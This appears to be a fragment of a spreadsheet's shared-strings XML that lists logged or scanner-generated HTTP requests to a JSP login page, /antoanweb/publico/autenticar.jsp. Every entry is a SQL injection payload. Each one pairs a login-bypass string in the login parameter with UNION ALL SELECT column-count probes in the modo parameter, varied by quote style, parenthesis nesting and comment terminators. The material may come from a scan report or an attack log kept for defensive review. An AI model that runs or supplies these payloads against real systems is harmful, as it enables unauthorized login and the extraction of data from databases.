    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect431,431,431,431,431,431,431,431,431,431,431,431,431,431,431,431,431,431,431,431,431,431,431,431,431,431,431,431,431--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830,7830--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9718,9718,9718,9718,9718,9718,9718,9718,9718,9718,9718,9718,9718,9718,9718,9718,9718,9718,9718,9718,9718--and(5783=5783</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565,3565--and(4894=4894</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727,9727--and(6773=6773</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9322,9322,9322,9322,9322,9322,9322,9322,9322,9322,9322,9322,9322,9322,9322,9322,9322,9322,9322,9322,9322,9322,9322,9322--and(8621=8621</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462,3462--and(2955=2955</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853--and(8618=8618</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887,8887--and(3387=3387</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863,7863--and(5091=5091</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782--and(121=121</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112--and(5798=5798</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783,5783--and((4708=4708</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect710,710,710,710,710,710,710,710,710,710,710,710,710,710,710,710,710,710,710,710,710,710--and((4692=4692</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect3297,3297,3297,3297,3297,3297,3297,3297,3297,3297,3297,3297,3297,3297,3297,3297,3297,3297,3297,3297,3297,3297,3297--and((6885=6885</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect558,558,558,558,558,558,558,558,558,558,558,558,558,558,558,558,558,558,558,558,558,558,558,558--and((3899=3899</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805,8805--and((9505=9505</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148,1148--and((4056=4056</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917,7917--and((8732=8732</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984,6984--and((8441=8441</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954,3954--and((6501=6501</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399--and((6057=6057</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect3680,3680,3680,3680,3680,3680,3680,3680,3680,3680,3680,3680,3680,3680,3680,3680,3680,3680,3680,3680,3680--and(((3188=3188</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect5353,5353,5353,5353,5353,5353,5353,5353,5353,5353,5353,5353,5353,5353,5353,5353,5353,5353,5353,5353,5353,5353--and(((2365=2365</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect1031,1031,1031,1031,1031,1031,1031,1031,1031,1031,1031,1031,1031,1031,1031,1031,1031,1031,1031,1031,1031,1031,1031--and(((6551=6551</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48--and(((3525=3525</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59--and(((2489=2489</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681,6681--and(((1591=1591</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273,4273--and(((3474=3474</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608--and(((9371=9371</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538,6538--and(((4043=4043</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562,562--and(((3931=3931</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect3314,3314,3314,3314,3314,3314,3314,3314,3314,3314,3314,3314,3314,3314,3314,3314,3314,3314,3314,3314,3314--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect2090,2090,2090,2090,2090,2090,2090,2090,2090,2090,2090,2090,2090,2090,2090,2090,2090,2090,2090,2090,2090,2090--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9505,9505,9505,9505,9505,9505,9505,9505,9505,9505,9505,9505,9505,9505,9505,9505,9505,9505,9505,9505,9505,9505,9505,9505--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798,6798--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094,3094--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402,6402--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654,3654--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5076,5076,5076,5076,5076,5076,5076,5076,5076,5076,5076,5076,5076,5076,5076,5076,5076,5076,5076,5076,5076--and('gpik'='gpik</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3992,3992,3992,3992,3992,3992,3992,3992,3992,3992,3992,3992,3992,3992,3992,3992,3992,3992,3992,3992,3992,3992--and('jqdk'='jqdk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5047,5047,5047,5047,5047,5047,5047,5047,5047,5047,5047,5047,5047,5047,5047,5047,5047,5047,5047,5047,5047,5047,5047--and('dyfg'='dyfg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220--and('sjou'='sjou</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691,1691--and('qchz'='qchz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678--and('bmjy'='bmjy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055,6055--and('ufyu'='ufyu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056,3056--and('iaua'='iaua</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690,3690--and('lqhm'='lqhm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964,9964--and('ulga'='ulga</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4527,4527,4527,4527,4527,4527,4527,4527,4527,4527,4527,4527,4527,4527,4527,4527,4527,4527,4527,4527,4527--and(('nnkh'='nnkh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393--and(('bcpv'='bcpv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2939,2939,2939,2939,2939,2939,2939,2939,2939,2939,2939,2939,2939,2939,2939,2939,2939,2939,2939,2939,2939,2939,2939--and(('oxks'='oxks</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1410,1410,1410,1410,1410,1410,1410,1410,1410,1410,1410,1410,1410,1410,1410,1410,1410,1410,1410,1410,1410,1410,1410,1410--and(('hfyw'='hfyw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212,2212--and(('odqo'='odqo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886--and(('rfeu'='rfeu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576,3576--and(('jdiw'='jdiw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761--and(('iwpp'='iwpp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148,7148--and(('moqx'='moqx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475,2475--and(('wlbj'='wlbj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245,6245--and((('wfaa'='wfaa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6808,6808,6808,6808,6808,6808,6808,6808,6808,6808,6808,6808,6808,6808,6808,6808,6808,6808,6808,6808,6808,6808--and((('tdnz'='tdnz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3764,3764,3764,3764,3764,3764,3764,3764,3764,3764,3764,3764,3764,3764,3764,3764,3764,3764,3764,3764,3764,3764,3764--and((('asdd'='asdd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2267,2267,2267,2267,2267,2267,2267,2267,2267,2267,2267,2267,2267,2267,2267,2267,2267,2267,2267,2267,2267,2267,2267,2267--and((('mbwy'='mbwy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664--and((('ilmf'='ilmf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471,5471--and((('vpbu'='vpbu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136--and((('qswv'='qswv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58--and((('xoyj'='xoyj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981,2981--and((('daqc'='daqc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996,9996--and((('yyma'='yyma</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2875,2875,2875,2875,2875,2875,2875,2875,2875,2875,2875,2875,2875,2875,2875,2875,2875,2875,2875,2875,2875--and'xadz'='xadz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6375,6375,6375,6375,6375,6375,6375,6375,6375,6375,6375,6375,6375,6375,6375,6375,6375,6375,6375,6375,6375,6375--and'pqbu'='pqbu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4234,4234,4234,4234,4234,4234,4234,4234,4234,4234,4234,4234,4234,4234,4234,4234,4234,4234,4234,4234,4234,4234,4234--and'kndh'='kndh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9497,9497,9497,9497,9497,9497,9497,9497,9497,9497,9497,9497,9497,9497,9497,9497,9497,9497,9497,9497,9497,9497,9497,9497--and'rtdv'='rtdv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046,9046--and'dfgz'='dfgz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230,3230--and'jnar'='jnar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824,3824--and'rlgk'='rlgk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect513,513,513,513,513,513,513,513,513,513,513,513,513,513,513,513,513,513,513,513,513,513,513,513,513,513,513,513--and'rhlm'='rhlm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect211,211,211,211,211,211,211,211,211,211,211,211,211,211,211,211,211,211,211,211,211,211,211,211,211,211,211,211,211--and'nqhs'='nqhs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425--and'yzbz'='yzbz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2228,2228,2228,2228,2228,2228,2228,2228,2228,2228,2228,2228,2228,2228,2228,2228,2228,2228,2228,2228,2228--and('sfvv'like'sfvv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1592,1592,1592,1592,1592,1592,1592,1592,1592,1592,1592,1592,1592,1592,1592,1592,1592,1592,1592,1592,1592,1592--and('hupk'like'hupk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051,7051--and('fyhk'like'fyhk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7679,7679,7679,7679,7679,7679,7679,7679,7679,7679,7679,7679,7679,7679,7679,7679,7679,7679,7679,7679,7679,7679,7679,7679--and('kvel'like'kvel</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect881,881,881,881,881,881,881,881,881,881,881,881,881,881,881,881,881,881,881,881,881,881,881,881,881--and('mqml'like'mqml</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144--and('ggmh'like'ggmh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075,6075--and('sqkh'like'sqkh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153--and('sjaj'like'sjaj</t>
  </si>
  <si>
